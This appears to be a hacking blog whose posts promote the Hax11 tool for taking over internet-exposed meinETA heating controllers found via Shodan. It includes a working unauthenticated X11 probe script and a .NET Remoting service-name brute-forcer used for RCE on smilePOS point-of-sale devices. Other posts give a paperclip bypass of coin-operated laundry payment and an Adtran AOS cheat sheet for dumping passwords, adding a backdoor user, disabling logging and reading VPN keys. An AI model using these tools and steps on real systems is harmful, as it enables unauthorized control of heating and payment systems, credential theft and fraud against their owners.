Saturday, February 10, 2024

Heating control system meinETA open to attack with Hax11

meinETA is a heating control system that can be accessed remotely via a password-protected portal. However, because it exposes the GUI over X11, anyone who can reach the meinETA system's IP can bypass that portal and manipulate the system directly with Hax11, as seen below.

The ETA site says this about meinETA:

meinETA: the free internet platform
If your heating boiler is connected to the internet, you can see and change all heating settings on your mobile, tablet or PC. So you always have a handle on your heating, wherever you are! When you login to www.meinETA.at, you see the touchscreen as if you were standing right in front of the boiler!

This means that with Hax11 you have full control of the system without going through the portal; all you need is the system's IP. That might seem like a big hurdle, but a few minutes on Shodan is enough to track systems down and take full control with a few keystrokes and mouse clicks. There doesn't seem to be any sort of authentication on the GUI, not even a PIN code, so there is nothing stopping you once you locate one.

More on ETA

Get Hax11 HERE

Thursday, October 5, 2023

Update to Hax11 allows connect to more display ports for larger attack surface

I have updated Hax11 to connect to non-default display ports. The previous version only allowed connecting to display 0 (port 6000), but now you can connect to any display a system has available.

Example:

If you want to connect to display 1 "port 6001" use this command:

python hax11.py ip.addr.here 1

If you want to connect to display 0 use the old command style:

python hax11.py ip.addr.here

You can connect to display 1, 2, 3, and so on (ports 6001, 6002, 6003, ...). I know it seems like a small change, but it doubles your attack surface or more. So while the change is small, the impact is big.
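The check that both this post and the meinETA post above rely on is whether an X server accepts a connection-setup request that carries no authorization data at all. If it answers Success, host-based access control is off (or your host is whitelisted) and a client like Hax11 can drive the display. The Python below is an added example written for this page, not Hax11's own code: it builds the 12-byte X11 setup request, maps a display number to its TCP port, decodes the three possible reply types, and includes two constructed replies (not captured from any real device) so the parser can be exercised offline. The release number, resource-id values and vendor string in the sample are made up.

```python
import socket
import struct

X11_BASE_PORT = 6000  # display N listens on TCP 6000 + N


def display_port(display: int) -> int:
    """Map an X display number to its TCP port (display 1 -> 6001)."""
    return X11_BASE_PORT + display


def _pad4(b: bytes) -> bytes:
    return b + b"\x00" * ((4 - len(b) % 4) % 4)


def build_setup_request(auth_name: bytes = b"", auth_data: bytes = b"") -> bytes:
    """Build the X11 connection-setup request (little-endian, protocol 11.0).
    With empty auth fields this is exactly what an unauthenticated client sends."""
    header = struct.pack("<BxHHHHxx", ord("l"), 11, 0, len(auth_name), len(auth_data))
    return header + _pad4(auth_name) + _pad4(auth_data)


def parse_setup_reply(data: bytes) -> dict:
    """Decode the server's setup reply. Status byte: 0 = Failed, 1 = Success, 2 = Authenticate."""
    status = data[0]
    if status == 0:
        reason_len = data[1]
        major, minor, _extra = struct.unpack_from("<HHH", data, 2)
        return {"status": "failed", "protocol": (major, minor),
                "reason": data[8:8 + reason_len].decode("latin-1")}
    if status == 2:
        (extra,) = struct.unpack_from("<H", data, 6)
        reason = data[8:8 + extra * 4].decode("latin-1").rstrip("\x00")
        return {"status": "authenticate", "reason": reason}
    if status == 1:
        major, minor, _extra = struct.unpack_from("<HHH", data, 2)
        # A fixed 32-byte block follows the 8-byte header: vendor length is at
        # offset 24, screen count at 28, and the vendor string starts at 40.
        (vendor_len,) = struct.unpack_from("<H", data, 24)
        screens = data[28]
        vendor = data[40:40 + vendor_len].decode("latin-1")
        return {"status": "success", "protocol": (major, minor),
                "vendor": vendor, "screens": screens}
    raise ValueError(f"unknown setup reply status {status}")


def is_open_without_auth(reply: dict) -> bool:
    """True when the server accepted a setup request carrying no authorization data,
    i.e. access control is disabled (xhost +) or this host is on the allow list."""
    return reply["status"] == "success"


def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b""
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError("server closed connection during setup")
        buf += chunk
    return buf


def probe_display(host: str, display: int = 0, timeout: float = 5.0) -> dict:
    """Connect to host:6000+display, send an unauthenticated setup request, decode the reply."""
    with socket.create_connection((host, display_port(display)), timeout=timeout) as sock:
        sock.sendall(build_setup_request())
        head = _recv_exact(sock, 8)
        # All three reply types carry the additional-data length (in 4-byte units) at offset 6.
        (extra,) = struct.unpack_from("<H", head, 6)
        return parse_setup_reply(head + _recv_exact(sock, extra * 4))


# Constructed sample replies (not captured from a real device) so the parser runs offline.
_VENDOR = b"The X.Org Foundation"  # 20 bytes, already 4-byte aligned
SAMPLE_OPEN_REPLY = (
    struct.pack("<BxHHH", 1, 11, 0, (32 + len(_VENDOR)) // 4)
    + struct.pack("<IIIIHHBBBBBBBB4x", 12101000, 0x00400000, 0x003FFFFF, 256,
                  len(_VENDOR), 65535, 1, 0, 0, 0, 32, 32, 8, 255)
    + _VENDOR
)
_REASON = b"No protocol specified"  # 21 bytes, padded to 24 -> 6 units of additional data
SAMPLE_DENIED_REPLY = struct.pack("<BBHHH", 0, len(_REASON), 11, 0, 6) + _pad4(_REASON)


if __name__ == "__main__":
    import sys
    target = sys.argv[1]
    disp = int(sys.argv[2]) if len(sys.argv) > 2 else 0
    result = probe_display(target, disp)
    print(f"{target}:{display_port(disp)} -> {result} open_without_auth={is_open_without_auth(result)}")
```

Run it as `python x11probe.py ip.addr.here 1` to test display 1 the same way the Hax11 command above does; a `failed` reply with "No protocol specified" means the server is reachable but is enforcing access control, while `success` means the display is wide open.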

Get it HERE

Enjoy! 

Saturday, April 1, 2023

smilePOS RCE via MS .NET Remoting


While searching the internets for MS .NET Remoting deployments to test my service name brute force script, I stumbled on a gem. 

While testing I noticed a lot of systems with port 9099 were vulnerable to MS .NET Remoting abuse that also had a web port with a smilePOS login page served up. This was the first I had ever heard of it, so a quick Google search suggested these were a POS device of sorts; this made sense, since all the ones I had found had the same ports and services running. 

So with a bit more looking around I could confirm RCE on all found smilePOS devices; 2021.1.2103.0 is the only version tested. The service names my tool was able to identify are r1 and r2. If anyone has something to add please let me know, otherwise enjoy.

Monday, March 20, 2023

Automate brute forcing service names in vulnerable MS .NET Remoting deployments.

Anyone familiar with exploiting an MS .NET Remoting service knows that finding the correct service name can be a pain without the source code. If you don't know what that is, Google is a good place to start. The tool ExploitRemotingService makes the job a snap, but it still has the limitation of needing the right service name, and brute forcing by hand is just crazy. 

I wanted to hack up something to make it less painful, so I searched the web for common object names, then searched GitHub for MS .NET Remoting apps and added the names they were using as well. Then I coded up a little bash script that uses the ExploitRemotingService tool and loops through the list I compiled. Testing so far shows it works like a charm with a few bugs. 

Still, I thought it could be a nice tool to have in your bag of holding, so I made it available on GitHub. I hope someone gets some use out of it. 

Usage: ./bfNET ip.addr port
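The same loop in Python, as an added example that is not the bfNET script itself: it builds the `tcp://host:port/Name` URI form that .NET Remoting TCP channels use, walks a deduplicated wordlist, and hands each URI to a probe callable. The probe that shells out to ExploitRemotingService treats a zero exit status as a hit; that success criterion and the exact command line are assumptions you adapt to your copy of the tool. The starter wordlist is constructed for illustration (r1 and r2 are the two names the smilePOS post above reported).

```python
import subprocess
from collections.abc import Callable, Iterable

# Constructed starter list; extend it with names harvested from GitHub projects.
DEFAULT_NAMES = [
    "RemoteObject", "RemotingServer", "Service", "Server", "HelloWorld",
    "MyRemoteObject", "RemoteService", "r1", "r2",
]


def remoting_uri(host: str, port: int, name: str) -> str:
    """Build the TCP-channel URI a .NET Remoting client uses for a well-known object."""
    return f"tcp://{host}:{port}/{name}"


def parse_wordlist(text: str) -> list[str]:
    """One candidate per line; drop blanks and '#' comments, keep first occurrence order."""
    out, seen = [], set()
    for line in text.splitlines():
        name = line.strip()
        if not name or name.startswith("#") or name in seen:
            continue
        seen.add(name)
        out.append(name)
    return out


def brute_service_names(host: str, port: int, names: Iterable[str],
                        probe: Callable[[str], bool], stop_on_first: bool = True) -> list[str]:
    """Try each candidate name against host:port and return the ones the probe accepted."""
    hits, seen = [], set()
    for name in names:
        if name in seen:
            continue
        seen.add(name)
        if probe(remoting_uri(host, port, name)):
            hits.append(name)
            if stop_on_first:
                break
    return hits


def tool_probe(tool_cmd: list[str], timeout: float = 15.0) -> Callable[[str], bool]:
    """Wrap an external tool as a probe. ASSUMPTION: tool_cmd is the invocation minus the
    URI (for example ["mono", "ExploitRemotingService.exe", ...]) and it exits 0 only when
    the service name resolved; check your tool's behaviour and adjust before relying on it."""
    def probe(uri: str) -> bool:
        try:
            proc = subprocess.run(tool_cmd + [uri], capture_output=True, text=True, timeout=timeout)
        except (subprocess.TimeoutExpired, FileNotFoundError):
            return False
        return proc.returncode == 0
    return probe


if __name__ == "__main__":
    import sys
    target, target_port = sys.argv[1], int(sys.argv[2])
    names = DEFAULT_NAMES
    if len(sys.argv) > 3:
        with open(sys.argv[3], encoding="utf-8") as fh:
            names = parse_wordlist(fh.read())
    # Placeholder command; replace with how you actually invoke ExploitRemotingService.
    found = brute_service_names(target, target_port, names, tool_probe(["ExploitRemotingService"]))
    print("hits:", found or "none")
```

Mirroring the `./bfNET ip.addr port` usage, this takes the host and port positionally and an optional wordlist path; swap `tool_probe` for your own callable if your tool signals success some other way.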

Get it here

Friday, January 13, 2023

Getting free cycles out of coin operated laundry machines

A friend of mine was telling me about how her landlord keeps raising the price on the washer and dryer in her apartment complex. She knew I liked playing with tech and machines, so she asked if we could figure out how to get the coins out. I explained that would be a bad idea, as it would be clear something was up if the machines never had money in them on collection day, but maybe we could figure out a way to get free use of them, which would be harder to detect. A door with a lock on top of the housing for the coin mechanism had a tubular lock, as seen below:


So I busted out my picks and got the door to open. Here is what I found when I bypassed the lock:

As you can see, it's just a few wires; I figured this was our access point to free cycles. You can see the white bracket that connects the coin functions to the machine below:
So I disconnected them, and since there are only two wires, I figured a simple bridge of the two would likely give me the results I was hoping for. I then grabbed a paperclip to bridge them and, just like that, we had free cycles! Here is what it looked like:
Now you just reconnect the wires, put the door back on, lock it, and push start. I gave the paperclip and tubular pick to my buddy so she can have free cycles at any place with greedy landlords. It was a fun little project and I was happy to help out.

Friday, October 7, 2022

Useful AOS (Adtran OS) CLI commands and tips for pentesting

Below is some AOS junk you might find useful in a pentest.


 CLI cmds:

Turn on privileged commands (all commands below assume enable has already succeeded):

enable

Disable logging for session

no events all 

From here, if the system is in a DMZ, hanging off the internet, or otherwise has the proper ports exposed, the easy route is to enable the HTTP server and continue from the web UI. 

configure terminal
http server 80 

If you can't access the HTTP server, the cmds below should help get some info out of the system. 

Lists users and PWs

show running-config | include username #displays usernames and passwords.

Add new user with op privs

configure terminal 

username operator privilege 10 password unencrypted passwd1

List IPs

show ip interfaces

Download a file to the target system (after running the cmd below you will be prompted for more data, and you will need a TFTP server running that is reachable from the target):

copy tftp flash (or: copy tftp cflash)

Download file from target to your system 

copy flash tftp

View VPN names and preshared keys

show crypto ike remote-id

View VPN configs (the cmd below should give all client configs; add a name at the end to view only that one's config)

show crypto ike configuration pool

View VPN policy

show crypto ike policy 

TCL script to set up a VPN in the AOS CLI, with walkthrough:

https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/182/1/Configuring%20Main%20Mode%20and%20Remote%20Client%20VPN%20in%20the%20AOS%20CLI.pdf

AOS CLI reference:

 https://supportcommunity.adtran.com/jmaxz83287/attachments/jmaxz83287/nv-aos/428/7/AOS%20R13.12.0%20Command%20Reference%20Guide.pdf

If you have anything to add please hit me up and let me know, I would love to see this grow!

Monday, August 29, 2022

Hax11 updated!

Hax11 has been updated to work on the latest Kali, and it's still a target rich environment out there folks! Get it HERE and get to hax0rin :)